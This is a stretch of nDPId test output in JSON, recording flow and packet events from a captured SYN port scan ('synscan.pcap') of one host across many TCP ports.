-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsdiIAADQGnlCsEAAIQA2GNIzTI5bdU4MZAAAAAGACBAAQ9gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsAz8AADQGETSsEAAIQA2GNIzTgBHdU4MZAAAAAGACBAC0egAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsSqUAAC4Gz82sEAAIQA2GNIzTINDdU4MZAAAAAGACDAALvAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4AAADsGqfKsEAAIQA2GNIzT7BvdU4MZAAAAAGACEAA8cAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsynEAAC0GUQGsEAAIQA2GNIzTC7jdU4MZAAAAAGACCAAk1AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsBJsAAC8GFNisEAAIQA2GNIzTBbXdU4MZAAAAAGACEAAi1wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsRjMAADoGyD+sEAAIQA2GNIzTCNTdU4MZAAAAAGACDAAjuAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsZnsAAC4Gs\/esEAAIQA2GNIzTFrPdU4MZAAAAAGACDAAV2QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsxl0AACUGXRWsEAAIQA2GNIzTAB7dU4MZAAAAAGACCAAwbgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsPtIAADIG16CsEAAIQA2GNIzTBAPdU4MZAAAAAGACDAAoiQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsn5YAADcGcdysEAAIQA2GNIzTH0DdU4MZAAAAAGACEAAJTAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsHnAAADgG8gKsEAAIQA2GNIzTwBjdU4MZAAAAAGACBAB0cwAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsrbQAADEGab6sEAAIQA2GNIzTAFLdU4MZAAAAAGACCAAwOgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAs2p4AADMGOtSsEAAIQA2GNIzTCHHdU4MZAAAAAGACEAAgGwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAshOQAACUGno6sEAAIQA2GNIzTJMfdU4MZAAAAAGACCAALxQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsIo8AADgG7eOsEAAIQA2GNIzTEB7dU4MZAAAAAGACBAAkbgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsVrUAAC0GxL2sEAAIQA2GNIzT4cXdU4MZAAAAAGACCABOxgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsDQ4AADkGAmWsEAAIQA2GNIzTGMrdU4MZAAAAAGACCAAXwgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAse1MAACYGpx+sEAAIQA2GNIzTCvDdU4MZAAAAAGACDAAhnAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAscl4AACwGqhSsEAAIQA2GNIzTEjbdU4MZAAAAAGACBAAiVgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsjp0AADcGgtWsEAAIQA2GNIzTHj3dU4MZAAAAAGACEAAKTwAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsTWIAAC8GzBCsEAAIQA2GNIzTAtbdU4MZAAAAAGACEAAltgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsNuUAACUG7I2sEAAIQA2GNIzTA5DdU4MZAAAAAGACCAAs\/AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsRV0AACwG1xWsEAAIQA2GNIzTPX7dU4MZAAAAAGACBAD3DQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAs1DsAADUGPzesEAAIQA2GNIzTZIbdU4MZAAAAAGACCADMBQAAAgQFtA=="} 